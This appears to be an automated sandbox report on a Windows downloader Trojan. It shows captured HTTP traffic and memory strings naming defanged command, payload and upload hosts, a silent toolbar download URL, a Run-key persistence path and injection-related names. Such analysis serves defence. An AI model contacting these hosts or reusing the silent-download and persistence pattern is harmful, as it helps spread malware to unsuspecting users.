Referer: hXXp://config.0551fs.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 09 Jul 2015 03:10:13 GMT
Content-Type: image/jpeg
Content-Length: 631
Last-Modified: Wed, 10 Jun 2015 07:17:28 GMT
Connection: keep-alive
ETag: "5577e488-277"
X-Server-IP: 61.147.111.59
Content-Range: bytes 0-630/631
......JFIF.....`.`.....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(.....
GET /Public/conf/resource_donum.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:18 GMT
Content-Type: text/xml
Content-Length: 4029
Last-Modified: Thu, 09 Jul 2015 03:05:01 GMT
Connection: keep-alive
ETag: "559de4dd-fbd"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
<?xml version="1.0" encoding="utf-8"?>.<root>.<time>201507090501</time>.<resource_donum>.<resource_1448>22</resource_1448>.<resource_58>13</resource_58>.<resource_1524>94</resource_1524>.<resource_1279>7</resource_1279>.<resource_11065>1</resource_11065>.<resource_574>4</resource_574>.<resource_1465>7665</resource_1465>.<resource_1093>33</resource_1093>.<resource_544>19</resource_544>.<resource_1216>5</resource_1216>.<resource_1470>10351</resource_1470>.<resource_2>2</resource_2>.<resource_1556>921</resource_1556>.<resource_16045>1</resource_16045>.<resource_840>118144</resource_840>.<resource_563>5</resource_563>.<resource_553>2</resource_553>.<resource_901>1</resource_901>.<resource_1020>1</resource_1020>.<resource_1280>3</resource_1280>.<resource_304>2</resource_304>.<resource_1460>2999</resource_1460>.<resource_487>1</resource_487>.<resource_1129>1</resource_1129>.<resource_1464>9081</resource_1464>.<resource_414>2</resource_414>.<resource_1304>85</resource_1304>.<resource_538>3</resource_538>.<resource_1471>76</resource_1471>.<resource_308>1</resource_308>.<resource_932>3</resource_932>.<resource_983>2<
<<< skipped >>>
GET /Public/conf/icon/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:20 GMT
Content-Type: text/xml
Content-Length: 1216
Last-Modified: Tue, 07 Jul 2015 11:15:33 GMT
Connection: keep-alive
ETag: "559bb4d5-4c0"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
..._..O.K......&.......y.....{.".......g.........<..w .L|.4W4..0.f.e.%..m.M...>.....X...b...5.;.Tf...l....<z...j:W]..a.....M;.....f.................. ..I.z.C ........C....;.)...re.......w...{N...<..(yUZ............C..6:.$...UZ............C..m9...8..^("......M....8.kD.B..O...O..63DKsNY|..P?.=...FT%...D!;....0T(!.,....d.....<.#."mI........D9R~.._...3hu. ..|..a...>.:7.........7>.@...D0M.s.CS....Zl.RQ.8...c ...G.1........z./.Y.E.o7...^w...d..&h...(Z......{..'.2.....K.....2i....u.x.b.a......JX.....#..}..c.{..k../o|.?.........../o|.?....kD.B..O.Nhu.p..va...Z..h.h.J*P.>......Av...4..T...~.x.G....7..B.Vtd?~..x..t..>..f..;.i.f..;..!)......~.w/"..FV..;.......@*.u.~._....P.q..q..!. ..7...... Wm.o`N.....7.D.S.....W .;...K........^.M.....}|=R|.w......;..(.....$-<...*.G2..WlCb.,..t.)e..#..n]..a.l...K....."G.....}.'.\e xc.m..O...D..5...Y.O.....K...@.....$ h)4....R..k. bO..4..i.1...c..W.....s.Jr.,..........s.Jr.,..U...T..{........\.._K9q.C._.`8.8.4....l.O.../-.?.9N...QxT....'Sx..6.1....h.......Z.r.v.`a........p.c..a..B......!.m.......q..SX...C.?...fgC:._..|xwH#..~..@F...:...t.pn...jk....".,.i.j...M...A.J....L...D........k._0.......F.8.n'.bR5........2 .n.7..k.......~<.S._".......X...w.[.W`.O..o.......Rw...i....OE...
GET /urg.asp?v=ravbase&t=rav&a= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 56
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC; path=/
Cache-control: private
hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspxHTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:29 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 56..Content-Type: text/html..Set-Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC; path=/..Cache-control: private..hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspx....
GET /urg.asp?v=ravbase&t=rav&a= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 56
Content-Type: text/html
Cache-control: private
hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspxHTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:37 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 56..Content-Type: text/html..Cache-control: private..hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspx....
GET /LogCenter.asp?info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC
HTTP/1.1 302 Object moved
Date: Thu, 09 Jul 2015 03:10:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: hXXp://rsup10.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ
Content-Length: 331
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://rsup10.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ">here</a>.</body>.....
GET /urg.asp?v=ravbase&t=rav&a= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 56
Content-Type: text/html
Cache-control: private
hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspx..
GET /app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 09 Jul 2015 03:10:31 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:31 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Tengine..Date: Thu, 09 Jul 2015 03:10:31 GMT..Content-Type: image/gif..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:31 GMT; path=/; domain=.cnzz.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cache..GIF89a.............!.......,...........L..;..
GET /Public/config/xlxc/install_begin.html?567015 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: config.0551fs.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:13 GMT
Content-Type: text/html
Content-Length: 329
Last-Modified: Wed, 20 May 2015 10:28:32 GMT
Connection: keep-alive
ETag: "555c61d0-149"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " hXXps://" : " hXXp://");document.write(unescape("ipt src='" cnzz_protocol "s11.cnzz.com/z_stat.php?id=1255160857' type='text/javascript'>
GET /Public/conf/c-lock/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:15 GMT
Content-Type: text/xml
Content-Length: 4232
Last-Modified: Wed, 08 Jul 2015 07:44:09 GMT
Connection: keep-alive
ETag: "559cd4c9-1088"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
.h....N..KN ...M..n7.#...!..t[......7....Zh.....].W._..C.S."..V|..#..o>>....R.R:..R...17.[.@.$.o.......JK...n7.#....)..vW....B....|.p....1J..S"....].a..:7j[........R.R:..qE.0.J.|.....|.n.0 .%b.......H..~.{..../......:^.K?.e.........`).r...c.....n4[9!V~....~...X{|y....W?.Cqr.Z..........p ..&S!.GB^W=...W....q.$.me...v3L..Y*.7.}I.)Q}. /!..HG..OYq....H...?dJTm...U,*Z...:...W?.Cqr..?..)...%6.jp%.....gM.#.'.N.z...RE...@...]......U..L.Jv:..n...gU.......^z..Z..... ..m...=...j.....9..0L=...W...\..N..<.?.. ..o..-. ...[..n7.#...!..t[...".h ..z.....;W..KO.~..).....q.*r[... q..9........R.R:..k.b5........olD.V.yF....|`.8.T.==.,"....3.`..... ...K'FM..|%....~.{..../[|f....YI.f.i......z..#...F....0..W?.Cqr..U..z.(...-..8....QU .............C.[......"v.0.>.<@PnIt.K]....Z...Q.. .Jlr.z.bY .%&}>...o'.....s.....L.A...\=...IV&..E...<I....8...Cb...c......n7.#..YZX"E..V.R..%....Ti..........t.%..W?.Cqr.E.../.A.f..2..#.'yA3.&..d....d.?v...L'|d...].0...n7.#...n.BU.l(.1v.(...EJ.,..Q9..P.n.?c21.....w=.,".....i..g.....?.y........L.{.:-s@.^.O....L..21.....wm-w.,'}D...K...d.k @.c...<....pv..M...A...n7.#.....5.............(W. ....,L..$].........J.#.h.H....Q,..NB6...|d.........AK....l..0 .%b..I.3..0.(..|?.'...RE...@.(...a...i.....!....t.3#.\.>x....k.}.......W?.CqrX.....M.N.m~.....Z...-.sK.E...-l<.\|.`-.......z.=.,".....QH?g.-)QDb..6E2&..,..D:..R.R:...RE...@.(...a...i.....!....t.3#.......w..WX.\.....R.R:..qE.0.J.|.(.....<Rx%W.'.KH`....WDKF......%......h.0J....|.....e. .......8.L.]7.w...}.v..N?. F.m..].......8,._..."..n7.
GET /stat.htm?id=1255160857&r=&lg=en-us&ntime=none&cnzz_eid=336905316-1436411426-&showp=1916x902&t=&h=1&rnd=1494402114 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: oz.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.6
Date: Thu, 09 Jul 2015 03:10:27 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT
Connection: close
Accept-Ranges: bytesGIF89a.............!.......,...........D..;..
GET /rs2012/RsPcVer12.xml HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: rsup10.rising.com.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 663
Content-Type: text/xml
Last-Modified: Thu, 09 Jul 2015 02:20:22 GMT
Accept-Ranges: bytes
ETag: W/"489dfeceedb9d01:df1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Jul 2015 03:10:51 GMT
<?xml version="1.0" encoding="utf-8"?>..<RISING>.. <PRODUCT NAME="Rav" VERSION="24.00.44.04" REBOOTVER="24.00.00.00">.. </PRODUCT>.. <URLLIST>.. <ITEM KEY="Validate">hXXp://rsup10.rising.com.cn/Register/Validate/PageInfo/RavRequest2012.aspx</ITEM>.. <ITEM KEY="Download">hXXp://download.rising.net.cn/rs2012/pcver/</ITEM>.. <ITEM KEY="Finish"> http://rsup10.rising.com.cn/Register/Validate/PageInfo/RequestFinished2012.aspx</ITEM>.. <ITEM KEY="Overtime"> hXXp://rsup10.rising.com.cn/Register/Validate/PageInfo/SnGetOverTime.aspx</ITEM>.. <ITEM KEY="Stat">hXXp://cloud.rising.com.cn/productstat/productStat.aspx</ITEM>.. </URLLIST>..</RISING>....
GET /Public/conf/open/1/35_1_0_1_1/11.jpg HTTP/1.1
Host: config.0551fs.com
Accept:
Referer: hXXp://config.0551fs.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 09 Jul 2015 03:10:14 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->....
The Trojan connects to the servers at the following location(s):
Map
Strings from Dumps
%original file name%.exe_1312:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp\3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp\3.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss2.tmp
nss2.tmp
071ab1b0a4a2577a7f7500b0849.exe
f071ab1b0a4a2577a7f7500b0849.exe
c:\%original file name%.exe
%Program Files%\ytda
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
9%xNMAV
.bH0h
\L9%C&
Zq.yS.
Nullsoft Install System v2.45
%original file name%.exe_1312_rwx_10004000_00001000:
callback%d
SinaInstall_567015.exe_1296:
.text
`.rdata
@.data
.rsrc
?456789:;
!"#$%&'()* ,-./0123
F%D,3
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegEnumKeyExA
RegOpenKeyExA
RegCreateKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileA
urlmon.dll
MSVCP60.dll
GdipSetImageAttributesColorKeys
gdiplus.dll
NETAPI32.dll
imagehlp.dll
WS2_32.dll
VERSION.dll
IMM32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
MSIMG32.dll
PSAPI.DLL
GDI32.dll
COMCTL32.dll
LZMA.dll
_Key_End_
_Key_Data_
_Key_Begin_
Location: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
HTTP/1.1
hXXp://
kernel32.dll
%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Range: bytes=%d-%d
Range: bytes=%d-
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Referer: %s
hXXp://config.0551fs.com/
Host: %s
GET %s HTTP/1.1
%s %d
-%s?id=%s
hp_win7_x86.dll",Show
hp_win7_x64.dll",Show
hp_xp_x86.dll",Show
soft.ini
SinashowClient.exe
SinaService.exe
hXXp://ok.sina.com.cn/
URLInfoAbout
uninstall.exe
VersionConfig.xml
%s _DeskTop_%s|%s|%s
DeskTopPop.exe
%s ID:%s
%s _InSetUP_ %s %s %s %s %s
Kpclick.ini
%d,%d,%d,%d,%d,%d
hXXp://config.0551fs.com/Public/conf/open/1/%s_%s/11.jpg
hXXp://config.0551fs.com/Public/conf/open/1/%s_%s/10.jpg
hXXp://config.0551fs.com/Public/conf/resource_donum.xml
_kprd%d_%d.xml
__KPLINK__ %s %s %s %s %s
kplink.exe
KpInjectCpaData
\ajax32.exe
\ajax64.exe
unrar.dll
%s%ld
hXXp://config.0551fs.com/Public/conf/conf_301page/sinashow.html
hXXp://ok.sina.com.cn/,
%d,%d
view_more_url
url_on_cancle_install
hXXp://config.0551fs.com/Public/conf/c-lock/2/%s_%s/%s.xml
%s?%s
D:\Program Files\
QueryInterface failed! ctrl: %d
Can't find the ctrl: %d
img.rar
hXXp://down.0551fs.com/xlxc/img/%s/img.png
skinconfig.ini
%s %s %s %s %[^
application/x-www-form-urlencoded
/upload.php
upload.0551fs.com
hXXp://config.0551fs.com/Public/conf/cybercafe_check/index.xml
%s%s%s
hXXp://config.0551fs.com/Public/conf/
/@1/@2/@3.xml
%s_%s
hXXp://ok.sina.com.cn/?id=%s
\soft.ini
SystemConfig\setting.ini
hXXp://tj.0551fs.com/report/
Statistics.dll
\InStaller.ini
area_url
resource_url
new_icon_url
max_num_exe
%d,%d|%d,%d
open_key
icon_url
url_check
hXXp://config.0551fs.com/Public/Configs/uninstall_end.html
hXXp://config.0551fs.com/Public/Configs/uninstall_begin.html
hXXp://config.0551fs.com/Public/Configs/v5_install_close.html
hXXp://config.0551fs.com/Public/Configs/index.html
hXXp://config.0551fs.com/Public/Configs/index2.html
hXXp://config.0551fs.com/Public/Configs/install_end.html
hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html
/index.php
XML_URL_TP
v5.tongji.kuping.cc
downURL
hXXp://down.shuyeer.net/kptoolbar/kptoolbar_b_50.exe
KPToolBarSilence.exe
UniversalMini.exe
KP4Mini.exe
Kp_BootClr.exe
soft.exe
installedSoftInfo.ini
Uninstall\installedSoftInfo.ini
%s?id=%s&class=silence
version.ini
.kptheme
.kpscr
.kplgui
.kpicon
.kpcur
.kprar
%s\%s,%d
%s\KpInstallTheme.exe
%s %%1
%s\Shell\Open\Command
%s\Shell
%s\DefaultIcon
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
=\/?!"';
(%d nulls removed)
length %d
to length %d
to %d bytes
\InStaller_prompt.ini
RARSetPassword
CWebBrowser2
colorkey
isshow
layer_%d
dddddd
m_kbt_cancel.rect %d,%d,%d,%d pt %d,%d
m_kbt_sure.rect %d,%d,%d,%d pt %d,%d
m_kbt_close.rect %d,%d,%d,%d pt %d,%d
SYSTEM\CurrentControlSet\Control\Keyboard Layouts
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
\*.lnk
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Type: %s
U_kprd7_93.xml
@.reloc
GetProcessWindowStation
GetCPInfo
ntdll.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
(*.*)
1.0.1.1
InStaller.EXE
ntvdm.exe_680:
.text
`.data
.rsrc
KERNEL32.dll
NTDLL.DLL
ADVAPI32.dll
GDI32.dll
USER32.dll
SoftPC
mscoree.dll
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
BIOS keyboard buffer overflow
hardware keyboard buffer overflow
%s Mouse %d.01 already installed
%s Mouse %d.01 installed
d:\xpsp\base\mvdm\softpc.new\host\src\nt_timer.c
d:\xpsp\base\mvdm\softpc.new\host\src\nt_eoi.c
C:\IBMBIO.SYS
C:\IO.SYS
C:\IBMDOS.SYS
C:\MSDOS.SYS
\ntio404.sys
\ntio411.sys
\ntio412.sys
\ntio804.sys
\ntio.sys
VJOY.DLL
%s %lxh
d:\xpsp\base\mvdm\softpc.new\host\src\nt_com.c
d:\xpsp\base\mvdm\softpc.new\host\src\config.c
Software\Microsoft\Windows NT\CurrentVersion\WOW\Console
\\.\$VDMLPT2
\\.\$VDMLPT3
\\.\$VDMLPT1
FONT.NT
\ega.cpi
d:\xpsp\base\mvdm\softpc.new\host\src\nt_fulsc.c
Drive %c:
Incompatible DOS diskette, C H R N = %d %d %d %d
\\.\A:
\\.\?:
d:\xpsp\base\mvdm\softpc.new\host\src\nt_event.c
WINDOWS VMM 4.0
WINDOWS NT 3.1
WINDOWS 386 3.0
WINDOWS 286 3.0
\_default.pif
d:\xpsp\base\mvdm\softpc.new\host\src\nt_det.c
VrRemoveOpenNamedPipeInfo
VrConvertLocalNtPipeName
VrAddOpenNamedPipeInfo
VrIsNamedPipeHandle
VrIsNamedPipeName
VrWriteNamedPipe
VrReadNamedPipe
midiOutShortMsg
midiOutLongMsg
WINMM.DLL
d:\xpsp\base\mvdm\softpc.new\host\src\nt_hosts.c
NtDeviceIoControlFile failed %x
d:\xpsp\base\mvdm\softpc.new\host\src\nt_sec.c
SoftPc: NtDeCommitVirtualMemory failed !!!! Status = %lx
NTVDMD.DLL
Check Keyboard Status
\ntdos404.sys
\ntdos411.sys
\ntdos412.sys
\ntdos804.sys
\ntdos.sys
demDosDispCall %s
config.nt
PIPE
%c:%sNUL
Software\Microsoft\Windows\CurrentVersion\Setup
Unimplemented SVC %d
Software\Microsoft\Windows NT\CurrentVersion\WOW\CmdLine
%s=%s%s /p %s\system32
%s=%3.3u,%3.3u,%s\system32\%s.sys%s
KEYB
\KEYBOARD.SYS
\KEYJ31.SYS
\KEY02.SYS
\KEY01.SYS
\KEYAX.SYS
%s,%d,%s
\KB16.COM
DosKeybIDs
System\CurrentControlSet\Control\Keyboard Layout\
DosKeybCodes
00000409
Software\Microsoft\Windows NT\CurrentVersion\WOW\Compatibility
Broken pipe
Inappropriate I/O control operation
Operation not permitted
ega.rom
vga.rom
v7vga.rom
bios4.rom
bios1.rom
profile.spc
.spcprofile
d:\xpsp\base\mvdm\softpc.new\host\src\x86_emm.c
CS:x IP:x OP:x x x x x
ntvdm.pdb
Ut.Ht$Ht
ItKIt9It.IIt
tK
HHt7Ht.Ht
YYt%F
SSSSSh
s*f;O%s$
V
t.HtHHt(Ht
GetCPInfo
NtEnumerateValueKey
NtOpenKey
ntdll.dll
RegCloseKey
RegQueryInfoKeyA
RegOpenKeyExA
GetConsoleOutputCP
GetSystemWindowsDirectoryA
GetWindowsDirectoryA
SetConsoleKeyShortcuts
VDMConsoleOperation
GetConsoleKeyboardLayoutNameA
EnumWindows
GetKeyState
VkKeyScanW
MapVirtualKeyA
GetKeyboardType
NtQueryValueKey
GetProcessHeap
ntvdm.exe
SoftPcEoi
cmdCheckTemp
cmdCheckTempInit
demIsShortPathName
'?--?1-?6-?:-??-??-:?-6?-1?--?1-?6-?:-??-:?-6?-1?--?--?1-?6-?:-??-:?-6?-1?
$$$(((---222888???
!"#$%&'(
SoftPC-AT Version 3
89:;?
autoexec.nt
00030
30333
?0?3???
!"#$%&'()
Userenv.dll
Software\Microsoft\Windows NT\CurrentVersion\Terminal Server
%SystemRoot%
\System32\command.com
%System%\ntvdm.exe
\\.\B:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%
NTVDM.EXE
5.1.2600.5512 (xpsp.080413-2111)
Windows
Operating System
5.1.2600.5512
5The NTVDM CPU has encountered an illegal instruction."Internal error in NTVDM procedure.#NTVDM does not support a ROM BASIC.BFailure to allocate the requested number of Expanded Memory pages.*A continuous RESET state has been entered.,The CMOS file cmos.ram could not be created.,The CMOS file cmos.ram could not be updated.
LAn installation file required by NTVDM is missing, execution must terminate.
Insufficient memory resources.=The NTVDM CPU has encountered an unsupported 386 instruction.TThe EMM command line in your config.nt contains invalid parameters or syntax errors.5The NTVDM CPU has encountered an unhandled exception.t
MS-DOS program files must end with the extension .EXE, .COM, or .BAT.
vAn application has attempted to %s, which cannot be supported. This may cause the application to function incorrectly./directly access an incompatible diskette format
16 bit Windows Subsystem
VThe system file is not suitable for running MS-DOS and Microsoft Windows applications."Memory error during intialization.
VThe system file is not suitable for running MS-DOS and Microsoft Windows applications."Memory error during intialization.
Unable to lock for exclusive access. Another application may be using the drive. When the other application has finished using the drive you may retry the operation.
Unable to lock for exclusive access. Another application may be using the drive. When the other application has finished using the drive you may retry the operation.
Drive %c: ZThe Application attempted to enable DOS graphics mode. DOS graphics mode is not supported.
Drive %c: ZThe Application attempted to enable DOS graphics mode. DOS graphics mode is not supported.
